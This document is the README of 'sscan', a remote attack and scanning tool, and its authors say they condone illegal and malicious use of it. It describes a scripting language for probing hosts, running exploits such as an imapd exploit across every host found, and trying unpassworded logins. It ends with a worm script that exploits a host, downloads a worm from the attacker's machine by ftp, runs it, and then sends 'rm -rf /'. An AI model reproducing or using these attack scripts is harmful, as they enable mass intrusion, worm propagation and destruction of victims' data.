**************************************************************
*********** sscan remote attack tool, version 0.1! ***********
**************************************************************
-------------------------
authors: main author: jsbach
j1mmy chose not to be listed as an author, but he helped a *LOT*.. he
cleaned up tons of code and wrote config.c and stuff..
-------------------------
NOTE:  WE TAKE FULL RESPONSIBILITY FOR EVERYTHING YOU DO ILLEGALLY WITH
THIS PROGRAM.  WE CONDONE ILLEGAL AND MALICIOUS USE OF THIS PROGRAM.

* general usage *

for multiple hosts:
./sscan www.domain.com/24
would assume the domain is on a class C, tcp ping sweep it, and then scan
the hosts found up.

to scan a DNS zone:
./tools/z0ne -o domain.com | ./sscan -s > logfile &

the -s flag tells sscan to wait for ip's in stdin, so use your favorite
ip gathering program and pipe it or something...

for a single host:
./sscan -vowww.victim.edu

* configuration *
edit Sscan.conf for configuration and stuff.. 
for example to have sscan finger the accounts guest, bbs, jsbach, j1mmy,
r4lph and ohday, you'd do:
FINGER=yes guest,bbs,jsbach,j1mmy,r4lph,ohday

the config file is pretty self explanatory heh.
you can have sscan launch off programs, initiate tcp connections and
have dialogs with hosts that fit certain criterian, negotiate telnet
connections and have sscan log into a host and execute shell commands
(useful in coding internet worms), etc, all via a simple built in
scripting language defined below.

* scripting language *
ok.. the idea is, you have strings of commands which are executed until
one is unsuccessful.  abstractly:

command_that_is_successful
command_that_is_successful
command_that_isnt_successful
command_that_is_successful
command_that_is_successful

now, the commands will be executed up to the point where the unsuccessful
command is executed, then it will skip to the next "script sequence",
delimited by a newline.  here is an example script.. the command format
will be described lower..

os[linux]
rpc[rpc.mountd]
addvuln[linux box running mountd. possibly vulnerable to overflow?]

now.. in this sequence, if the os "string" doesnt contain the text
"linux", sscan will skip the rest of the sequence and skip ahead to
the next newline (more on os detection later).
if the os string contains "linux" (for example, the string "redhat linux
5.2 contains "linux"), it will then check if the rpc service rpc.mountd
exists, if it does, it will move on to the addvuln[] statement.
addvuln[] adds the string "linux box running mountd. possibly vulnerable 
to overflow?" to a global linked list containing vulnerability strings.  
The string added with addvuln[] will be printed when sscan finishes
scanning the host, along with all the other vulnerabilities.  After the
addvuln[] line, sscan will run into the \n on the next line and know that 
the script sequence is over.

THE COMMANDS:
 * symbolz *
$remoteip : the ip we're scanning
$localip : our ip =)

 * general commands: *
os[string] : check if the os is string
rpc[string] : check if the rpc service string is available
port[number] : check if the tcp port number is open
cgi[script] : check if the cgi script is available
sh[string] : executes system(string) after resolving symbols/variables
print[string] : prints "-<[ hostname: string" to stdout..
addvuln[string] : adds string to the global linked list of vulnerabilities
		found on the current host.  it's use is recommended over
		the print[] statement.
checkvuln[string] : searches the global linked list for a vulnerability
		    containing string.  For example, if the current box
		    was running phf, checkvuln[/cgi-bin/phf] would return
		    true, since the string "/cgi-bin/phf" is contained in
		    the string "/cgi-bin/phf is present on this host".
 * dialog commands: *
starttelnetdialog[port] : negotiate a telnet connection on specified port
starttcpdialog[port] : open a tcp connection to the specified port
send[data] : send data followed by a \r\n on the open socket connection
		made by starttelnetdialog or starttcpdialog. returns true
		if data is send successfully.
read[string] : check if the string is contained in data read off the open
		socket connection made by starttelnetdialog or
		starttcpdialog.  for example, if the command was:
		read[hello] and the string "hello world" was read
		off the socket, read[] would return true.
wait[number] : wait the specified number of seconds. always returns true.
enddialog : close the sockfd opened by either of the dialog init commands.

* os detection fingerprint format *
the os detection file is written in the same scripting language, with
the added commands registeros[] and response[].

response[] checks for certain tcp flags and fields in responses to
the same obscure tcp segments queSO uses.  the segments are sent in the
following order: 
SYN|ACK, FIN, FIN|ACK, SYN|FIN, PUSH.

you can use the following criterean for evaluating the responses to these
datagrams:
(S = syn, F = fin, A = ack, R = rst, P = push, W = window > 0,
 N = acknum > 0)

registeros[string] would register string as the operating system of the
current host, and then exit the script.

For example, if a certain os responded to packet #3 with a SYN|FIN|ACK
and a window > 0, you could do:

response[3,SFAW]
registeros[some cool os!]

* some ideas for scripts... *
you can have sscan launch programs all the time, or when it finds hosts
that match certain criteria... for example, if you are a system
administrator and want to alert the owners of all solaris boxes running
nlockmgr that their boxes can be 0wned, you could do...

os[solaris]
rpc[rpc.nlockmgr]
sh[echo dont run nlockmgr bitch | mail root@$remoteip]

performing commands on every box encountered is as easy as this:

sh[traceroute $remoteip]
sh[host -a $remoteip]
sh[mtupathdiscover $remoteip]

that would execute traceroute, host -a, and mtupathdiscover on every
host sscan encounters...

or...

starttcpdialog[143]
wait[2]
read[IMAP]
enddialog
sh[./imapdexploit $remotehost]

would execute imapdexploit on every host found running imapd.

you can use tcp dialogs to check versions of services, like this:

starttcpdialog[25]
wait[1]
read[8.8.5]
enddialog
print[runz sendmail 8.8.5.. remote r00t!]

or to check for unpassworded accounts like this: 

os[irix]
starttelnetdialog[23]
wait[2] # wait for login:
read[ogin:]
send[lp]
wait[2] # delay a bit..
read[$] # are we logged into a shell?
enddialog
print[successfully logged into unpassworded lp account!]

you could probably write a whole internet worm in the scripting language..
here's a hypothetical example:

os[linux]
port[143] # is imapd available?
starttcpdialog[143] # connect to imap port
wait[2] 
read[IMAP version blah blah] # check if its vulnerable
enddialog # close connection
sh[./exploit_that_appends_b4b0_to_passwd_file $remoteip] #try exploit!
starttelnetdialog[23] # our account has been added, telnet to the host
wait[2]
send[b4b0] # login as b4b0
wait[2]
read[last] # expect "last login tuesday blah blah" if we're logged in
wait[2]
send[ftp $localip] # ftp back to the host we infected
wait[2]
send[get /tmp/b4b0w0rm.tgz /tmp/b4b0w0rm.tgz] # transfer up the worm
wait[30] # wait for the file transfer to finish
send[quit] # quit the ftp program
wait[3]
send[tar -zxvf /tmp/b4b0w0rm.tgz; /tmp/b4b0w0rm/startupscript &]
wait[50000] # wait 50,000 seconds before we rm -rf / ;)
send[rm -rf /] # w00h00!!!! dont try this at home kidz ;)
enddialog

We don't condone mindless destruction.. that was a joke..

